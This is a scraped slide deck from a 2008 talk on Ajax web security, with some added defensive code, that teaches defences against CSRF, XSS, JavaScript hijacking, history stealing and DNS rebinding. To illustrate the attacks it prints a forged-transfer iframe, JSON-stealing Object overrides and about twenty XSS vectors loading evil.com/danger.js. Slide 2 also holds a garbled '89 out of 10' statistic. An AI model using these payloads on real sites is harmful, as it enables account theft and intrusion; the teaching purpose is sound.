Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
RAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIRAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AI
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum Computing
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 

Ajax Security

  • 1. Ajax Security: Keeping your application safe. Joe Walker. Copyright SitePen, Inc. 2008. All Rights Reserved
  • 2. 89 out of 10 Websites have serious vulnerabilities
  • 3. Goal: Keep the bad guys out of your website
  • 4. The Attackers. Who is the attacker? Troublemakers / Thieves. Who is the victim? Your data / Your users / Your partners
  • 5. Agenda: CSRF, Login CSRF; JavaScript Hijacking; XSS; History Stealing; Combination Attacks; Session Fixation + ADP + Clickjacking
  • 6. CSRF (Cross Site Request Forgery). You can still abuse someone else's cookies and headers even if you can't read them
  • 7. Recap: Cross-Domain Rules. On www.bank.com: c = document.cookie; alert(c); /* Shows cookies from www.bank.com */ On www.evil.com: c = document.cookie; alert(c); /* Shows cookies from www.evil.com */
  • 8. Abusing a Cookie without reading it. www.bank.com: "Welcome to Bank.com. We offer the best rates anywhere in the world, guaranteed. Give us your money and we will look after it in the same way we look after little baby kittens." www.evil.com: "Welcome to Evil.com. We've got lots of warez to give away for freee. Download our stuffs and then come back and get more stuffs. Videoz, Warez, Codez, Mp3s." plus a hidden <iframe width=0 height=0 src="http://bank.com/transfer?amnt=all&dest=MrEvil"/>
  • 9. CSRF. JavaScript is not always required to exploit a CSRF hole. Often all you need is: <iframe src="dangerous_url">, or <img src="dangerous_url"/>, or <script src="dangerous_url">. You can't use XHR because cross-domain rules prevent the request from being sent
  • 10. CSRF. CSRF attacks are write-only (with one exception). Both GET and POST can be forged. Referrer checking is not a complete fix. It's not just cookies that get stolen: HTTP-Auth headers; Active Directory Kerberos tokens
  • 11. CSRF - Protection. Force users to log off (not a 100% solution). Check referrer headers (https only; not a 100% solution). Include authentication tokens in the body of EVERY request (the only complete solution)
  • 12. CSRF - Protection. Security tokens in GET requests are not a great idea (bookmarks, caches, GET is idempotent etc). POST means forms with hidden fields: OWASP servlet filter http://www.owasp.org/index.php/CSRF_Guard. Double-submit cookie pattern (Ajax requests only): read the cookie with JavaScript and submit it in the body
  • 13. Login CSRF (Tricking someone into thinking they are you). CSRF turned inside out
  • 14. Login CSRF. If I can make your browser do things behind your back, how about logging you out of some service and back in as me? What are the possibilities when you think that you are you, but you're not; you're me?
  • 15. Login CSRF - Attacks. What can I do? See what you search for; see what books you want to buy; read emails that you send; steal credit card details through PayPal; etc
  • 16. Login CSRF - Defense. If submitting over https: use Referrer checking (do not assume no referrer is safe). Use authentication tokens in your login form. Watch out for session fixation attacks: invalidate the server session on login and re-create it
  • 17. JavaScript Hijacking (or how your GMail contacts were at risk). Sucking data out of Objects before they're created
  • 18. JavaScript Hijacking. "CSRF is write-only with one known exception." Using <script> automatically evaluates the returned script. So if you can just find a way to intercept scripts as they are evaluated ...
  • 19. <script type="text/javascript"> function Object() { alert("Hello, World"); } var x = {}; </script>
  • 20. <script type="text/javascript"> function Object() { this.__defineSetter__('wibble', function(x) { alert(x); }); } var x = {}; x.wibble = "Hello, World"; </script>
  • 21. <script type="text/javascript"> var obj; function Object() { obj = this; this.__defineSetter__('killme', function(x) { for (key in obj) { if (key != 'killme') { alert('Stolen: ' + key + '=' + obj[key]); } } }); setTimeout("obj['killme']='ignored';", 0); } </script> <script src="http://example.com/data-service/">
  • 22. JavaScript Hijacking. When you serve JavaScript from a website it could be evaluated in a hostile environment. Protect secrets in JavaScript in the same way that you would protect them elsewhere
  • 23. JavaScript Hijacking. Sometimes people wish to have a double layer of security to prevent evaluation: /*<JSON_HERE>*/ (Don't do this); while(true); <JSON_HERE> (Google); throw new Error(""); <JSON_HERE> (DWR); {}&& <JSON_HERE>
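The "double layer" prefixes of slide 23 as a server-side wrapper and the matching same-origin client unwrapper, added here as an example; this is not code from the slides, from Google or from DWR. It assumes the server sends plain text, that the page's own code fetches it by same-origin XHR, and that a cross-domain page can only pull it in through <script src>, which is what the helper `scriptEvalBlocked` stands in for.

```javascript
// Added example (not from the slides, Google or DWR): slide 23's prefixes as
// a server-side wrapper plus the client-side unwrapper that strips them.
// new Function(text)() below is a stand-in for what <script src> does.

const PREFIXES = {
  comment: '/*',               // slide 23: "Don't do this" (a */ in the data reopens it)
  google: 'while(true);',      // evaluating it as a script loops forever
  dwr: 'throw new Error("");', // throws before the data literal is reached
  and: '{}&&',                 // an empty block, then a syntax error
};

// Server side: a bare JSON array is a valid JavaScript program (that is what
// made the contact-list hijack possible), so the prefix is what stops a
// cross-domain <script src> from getting at the data.
function wrapJson(data, style = 'dwr') {
  if (!(style in PREFIXES)) throw new Error('unknown prefix style: ' + style);
  const json = JSON.stringify(data);
  return style === 'comment' ? PREFIXES.comment + json + '*/' : PREFIXES[style] + json;
}

// Client side (same origin, via XHR): strip a known prefix, then parse.
// Unprefixed bodies are refused so a misconfigured endpoint fails closed.
function unwrapJson(text) {
  for (const style of ['google', 'dwr', 'and']) {
    const p = PREFIXES[style];
    if (text.startsWith(p)) return JSON.parse(text.slice(p.length));
  }
  throw new Error('response is missing the anti-hijacking prefix');
}

// Does evaluating the text as a script fail (parse error or thrown error)?
// Never call this on the while(true) variant: it would spin forever, which
// is exactly that prefix's point.
function scriptEvalBlocked(text) {
  try {
    new Function(text)();
    return false;
  } catch (e) {
    return true;
  }
}

// Can a naive consumer JSON.parse the wire text directly? (Should be no.)
function isPlainJson(text) {
  try { JSON.parse(text); return true; } catch (e) { return false; }
}

// Constructed sample: the kind of array the slides say was at risk.
const contacts = [{ name: 'Alice', email: 'alice@example.com' }];

console.log('bare JSON runs as a script:', !scriptEvalBlocked(JSON.stringify(contacts)));   // true
console.log('DWR prefix blocks it:      ', scriptEvalBlocked(wrapJson(contacts, 'dwr')));  // true
console.log('{}&& prefix blocks it:     ', scriptEvalBlocked(wrapJson(contacts, 'and')));  // true
console.log('client still gets the data:', unwrapJson(wrapJson(contacts, 'google')));
// Why the comment form is on the "don't" list: data containing */ ends the
// comment early, and what follows is live code.
console.log('comment prefix, data with */:', scriptEvalBlocked(wrapJson(['*/ 1 /*'], 'comment'))); // false
```

The prefix does nothing for a response that an attacker can already read by other means; it only closes the <script src> channel, so it sits alongside, not instead of, the CSRF token checks earlier in the deck.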
  • 24. XSS (Cross Site Scripting). Abusing someone's trust in your typing
  • 25. (no text on this slide)
  • 26. XSS. 2 types: Reflected: script embedded in the request is 'reflected' in the response. Stored: attacker's input is stored and played back in later page views
  • 27. XSS. Scenario: you let the user enter their name. Someone is going to enter their name like this: Joe<script src="http://evil.com/danger.js"> Then, whoever looks at Joe's name will execute Joe's script and become a slave of Joe. Generally HTML is not a valid input, but sometimes it is: blogs, MySpace, wikis, RSS readers, etc
  • 28. XSS - Making User Input Safe. So, you filter out '<script.*>' and then you're safe. Right?
  • 29. XSS - Places that scripts get eval()ed:
      1. <table background="javascript:danger()">
      2. <input type='image' src='javascript:danger()'/>
      3. <object type="text/x-scriptlet" data="evil.com/danger.js">
      4. <img src='javascript:danger()'/>
      5. <frameset><frame src="javascript:danger()">
      6. <link rel="stylesheet" href="javascript:danger()"/>
      7. <base href="javascript:danger()">
      8. <meta http-equiv="refresh" content="0;url=javascript:danger()">
      9. <p style='background-image: url("javascript:danger()")'>
      10. <a href='javascript:danger()'>
      11. <tr background="javascript:danger()">
      12. <body onload='danger()'>
      13. <div onmouseover='danger()'>
      14. <body background="javascript:danger()">
      15. <div onscroll='danger()'>
      16. <div onmouseenter='danger()'>
      17. <style>@import evil.com/danger.js</style>
      18. <style>BODY{-moz-binding:url("http://evil.com/danger.js#xss")}</style>
      19. <xss style="behavior:url(danger.htc);">
      20. <div style="background-image: url(javascript:danger())">
      21. <div style="width: expression(danger());">
      22. <xss style="xss:expression(danger())">
      Many more: http://ha.ckers.org/xss.html
  • 30. XSS - Making User Input Safe. It's made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html" link</a> makes perfect sense to a browser.
  • 31. XSS - Making User Input Safe. It's made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html">link makes perfect sense to a browser.
  • 32. XSS - Making User Input Safe. It's made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html >link</a> makes perfect sense to a browser.
  • 33. XSS - Making User Input Safe. It's made 1000 times worse by browsers being able to make sense of virtually anything. This (depending on some encoding tricks): ¼a href="a.html"¾link¼/a¾ makes perfect sense to a browser.
  • 34. XSS - Making User Input Safe. And we haven't got into: Flash (ActionScript ~= JavaScript); SVG (can embed JavaScript); XML Data Islands (IE only); HTML+TIME. You can use both <object> and <embed> for many of these
  • 35. XSS - The Heart of the Problem. "Be conservative in what you do; be liberal in what you accept from others" (Postel's Law)
  • 36. XSS - The Heart of the Problem. [diagram: In, A, Out, B]
  • 37. The web developers get lazy ...
  • 38. The browser fixes the problems ...
  • 39. The users like the new browser ...
  • 40. The web developers get even lazier ...
  • 41. The browser fixes the problems ...
  • 42. The users like the new browser even more ...
  • 43. XSS - The Heart of the Problem. ¼STYLE¾@import'javas cri pt:danger()';¼/STYLE¾
  • 44. XSS - Protection (HTML is Illegal). 1. Filter inputs by white-listing input characters (remember to filter header names and values). 2. Filter outputs for the destination environment. For HTML: < becomes &lt;, > becomes &gt;, ' becomes &apos;, " becomes &quot;, & becomes &amp;. For JavaScript strings (but see later): ' becomes \', " becomes \", LF becomes \n, CR becomes \r, * (all other characters) becomes \uXXXX. Other environments have other special chars
  • 45. XSS - Protection (well-formed HTML is legal). 1. Filter inputs as before. 2. Validate as HTML and throw away if it fails. 3. Swap characters for entities (as before). 4. Swap back a whitelist of allowed tags, e.g. &lt;strong&gt; becomes <strong>. 5. Take extra care over attributes: &lt;a href=&quot;([^&]*)&quot;/&gt; becomes <a href="$1"/>. 6. Take great care over regular expressions
• 46. XSS - Protection (malformed HTML is legal) 1. Find another way to do it / swap jobs / find some other solution to the problem 2. Create a tag soup parser to create a DOM tree from a badly formed HTML document • Remember to recursively check encodings 3. Create a tree walker that removes all non-approved elements and attributes
• 47. There is NO WAY to protect against some injection points
• 48. XSS - Injection Points Places you can protect: • Plain content: <div>$</div> • Some attribute values: <input name=x value="$"> (but take care) • JavaScript string values: <script>str = "$";</script> (but take care) Anything else is likely to be unsafe
• 49. XSS - Injection Points Places you can’t easily protect: • <script>$</script> • <div $> • <div style="$">... • <div background="$"> • <img src="$"> • etc. If users can affect CSS values, hrefs, srcs or plain JavaScript then you are likely to have an XSS hole
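Slides 44, 45 and 48 in working code, as an added example that is not part of the presentation: entity encoding for HTML and JavaScript-string injection points, then the “escape everything and swap back a whitelist” approach. The tag list, the http(s)-only restriction on href and the use of &#39; instead of &apos; are my choices, not the slides’.

```javascript
// Added example, not from the slides: output encoding for the two injection
// points slide 48 calls protectable, then slide 45's "escape everything and
// swap back a whitelist" approach. Tag and scheme allowlists are my choice.

// Slide 44: entity-encode for a text node or a quoted attribute value.
// &#39; is used rather than &apos; because older HTML parsers do not know &apos;.
function escapeHtml(s) {
  const map = { '<': '&lt;', '>': '&gt;', "'": '&#39;', '"': '&quot;', '&': '&amp;' };
  return String(s).replace(/[<>'"&]/g, (c) => map[c]);
}

// Slide 44: escape for a JavaScript string literal. Backslash and the quote
// and newline characters get their short forms; every other non-alphanumeric
// character becomes \uXXXX, so "</script>" can never close the enclosing tag.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ]/g, (c) => {
    switch (c) {
      case '\\': return '\\\\';
      case "'": return "\\'";
      case '"': return '\\"';
      case '\n': return '\\n';
      case '\r': return '\\r';
      default: return '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0');
    }
  });
}

// Slide 45, steps 3-5: encode everything, then swap back only whitelisted
// tags. For <a>, the href is captured with [^&]* as on the slide, so an
// encoded quote (&quot;) cannot end the value early and smuggle an extra
// attribute; the http(s) prefix is an added restriction against javascript: URLs.
const SIMPLE_TAGS = ['strong', 'em', 'p'];
function allowSafeTags(input) {
  let out = escapeHtml(input);
  for (const tag of SIMPLE_TAGS) {
    out = out.replace(new RegExp('&lt;(/?)' + tag + '&gt;', 'g'), '<$1' + tag + '>');
  }
  out = out.replace(/&lt;a href=&quot;(https?:\/\/[^&]*)&quot;&gt;/g, '<a href="$1">');
  out = out.replace(/&lt;\/a&gt;/g, '</a>');
  return out;
}
```

Because escapeHtml runs first, any entity already present in the input is itself encoded, so only tags the user typed literally can be swapped back.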
• 50. XSS Tricks: Comment Power-up
• 51. XSS - Comment Power-up Commonly reflected attacks have length restrictions. How to create space for an injection attack: • Use ‘<script>/*’ in a restricted, unprotected field and ‘*/’ in a later unrestricted, protected field
• 52. XSS - Summary For data input: • Restrict allowed characters for the destination type For data output: • Escape for the destination environment • Ensure the encoding is specified (e.g. UTF-8) Allow injection only into known safe points. Never assume that a hole is too small to jump through
  • 53. History Stealing I know where you’ve been, parts 1, 2, 3
• 54. History Stealing - Part 1 Mr. Evil wants to know if you visit bank.com. He creates a page with a link and uses a script to read the CSS link color: • purple: customer • blue: not a customer
• 55. History Stealing - Part 2 Two methods of detecting link color: • Easy: use JavaScript to read CSS properties • When JS is turned off: use CSS to ping the server
• 56. History Stealing - Part 2 Point a script tag at a protected HTML resource, detect differing replies by differing error messages: <script src="http://mail.google.com/mail"> http://ha.ckers.org/weird/javascript-website-login-checker.html
• 57. History Stealing - Part 3 A page can quickly check thousands of sites and find where you bank and store your email. A page can follow your clicks around the net: • Check for a common set of URLs • Page reports hits to server • Server reads hit pages, greps out links, sends links back • Page checks and follows a click-stream
  • 58. Combination Attacks Small holes don’t add up, they multiply up
• 59. Web Worms If your site isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts. XHR/Flash/Quicktime can be used as a vector. Web worms grow much faster than email worms. So far, infections have been mostly benign, like how email worms were in the early 90’s ... http://www.whitehatsec.com/downloads/WHXSSThreats.pdf
• 60. Intranet Hacking History stealing to enumerate hosts inside the firewall. Anti-DNS pinning to read HTML from inside. Many routers / firewalls / etc. have default passwords, which an attacker can exploit. Use CSRF to alter router / firewall settings. http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf
  • 61. Clickjacking When the page you are looking at is not the page you think you are looking at
• 62. Clickjacking - Protection if (window.top != window) { document.body.style.display = "none"; }
  • 63. ADP = Anti DNS Pinning Moving intranet servers into your domain
• 64. Anti-DNS Pinning (diagram: browser, DNS for evil.com, and two servers, 1.2.3.4 and 10.0.0.1)
• 65. Anti-DNS Pinning Browser: Let’s visit evil.com
• 66. Anti-DNS Pinning Browser to DNS: What’s the IP address for evil.com?
• 67. Anti-DNS Pinning DNS to browser: You need 1.2.3.4 (timeout = 1 sec)
• 68. Anti-DNS Pinning Browser to 1.2.3.4: Can I have http://evil.com?
• 69. Anti-DNS Pinning 1.2.3.4 to browser: HTML + JavaScript that creates an iframe 2 seconds after the page has loaded
• 70. Anti-DNS Pinning Time passes (2 seconds)
• 71. Anti-DNS Pinning Browser to DNS: What’s the IP address for evil.com?
• 72. Anti-DNS Pinning DNS to browser: You need 10.0.0.1
• 73. Anti-DNS Pinning Browser to 10.0.0.1: Can I have http://evil.com/blah?
• 74. Anti-DNS Pinning 10.0.0.1: This web server is really http://intranet.corp.com
• 75. Anti-DNS Pinning Outer frame reads text from inner iframe and sends it back to 1.2.3.4
• 76. Anti-DNS Pinning About ‘Pinning’: Browsers ‘pin’ addresses to stop short timeouts. DNS round-robin forces a re-query of DNS if the website appears to be down. So websites can get around pins by firewalling themselves, thus appearing to be down.
• 77. Anti-DNS Pinning It’s not great for the Internet: The browser thinks the domain is evil.com, so cookies for innocent.com are not sent: cookie-protected resources are safe (for now). But it’s great for Intranet hacking: no cookies needed to read from 192.168.0.1 or 127.0.0.1
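In the sequence on slides 64 to 75 the browser is steered to 10.0.0.1 but still asks for http://evil.com, so the intranet server receives a Host header that is not one of its own names. A server-side check on that header, as an added defensive example that the slides do not cover (hostnames, port and the 421 status are my assumptions, and the request gate assumes a Node http-style req/res pair):

```javascript
// Added example, not from the slides: a server-side check against the
// rebinding scenario on slides 64-77. The browser rebound to 10.0.0.1 still
// sends "Host: evil.com", so an intranet server can refuse any request whose
// Host header is not one of its own names. Hostnames and port are assumptions.
const OWN_HOSTS = new Set(['intranet.corp.com', 'intranet.corp.com:8080']);

// Returns true only if the Host header names this server. The header is
// lower-cased and a trailing dot is dropped; an absent or malformed header
// is rejected rather than defaulted to "this host".
function hostHeaderAllowed(hostHeader, allowed = OWN_HOSTS) {
  if (typeof hostHeader !== 'string' || hostHeader.length === 0) return false;
  const host = hostHeader.trim().toLowerCase().replace(/\.(?=:|$)/, '');
  // Only plain DNS names with an optional port; IPv6 literals are not expected here.
  if (!/^[a-z0-9.-]+(:\d{1,5})?$/.test(host)) return false;
  return allowed.has(host);
}

// Gate to call first in an http.Server 'request' handler (hypothetical usage):
// rejects the request and returns false when the Host header is foreign.
function gateRequest(req, res) {
  if (!hostHeaderAllowed(req.headers.host)) {
    res.statusCode = 421; // Misdirected Request
    res.end('unknown host');
    return false;
  }
  return true;
}
```

The same check belongs on every intranet service, not only the one the attacker happened to pick, because the browser's cookies are irrelevant to this read: only the Host header tells the server something is wrong.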
• 78. Questions? Joe Walker http://sitepen.com http://directwebremoting.org/blog/joe
  • 79. Web 2.0 Hacking Everything has a down side
• 80. Web 2.0 Hacking Building blocks: • Google Alerts: Search to EMail • Mailinator: EMail to RSS • Ponyfish: Web to RSS via scraping • Storage: DabbleDB, Zoho • Yahoo Pipes: RSS remixing • L8R: Cron for EMail • Google Mashup Editor: RSS to REST API • Dapper, OpenKappow
• 81. More Information
• 82. Dropping SSL after login is dangerous Being able to snoop on someone else’s cookie is virtually the same as being able to snoop on their password. Some services (e.g. Google) default to http after login (bad), but allow you to use https for the whole session: • https://mail.google.com/mail/ • https://www.google.com/calendar/ • etc.
• 83. Useful Tools Firefox: • NoScript - Accept scripts only from sites you trust • AltCookies - Accept cookies only from sites you trust • EditCookies - Alter cookies for testing • Firebug - Dig deeply into HTTP, JavaScript and CSS General: • Paros - Filtering proxy (can be configured to be transparent) • Burp - Like Paros • Fiddler - Like Paros with integration into IE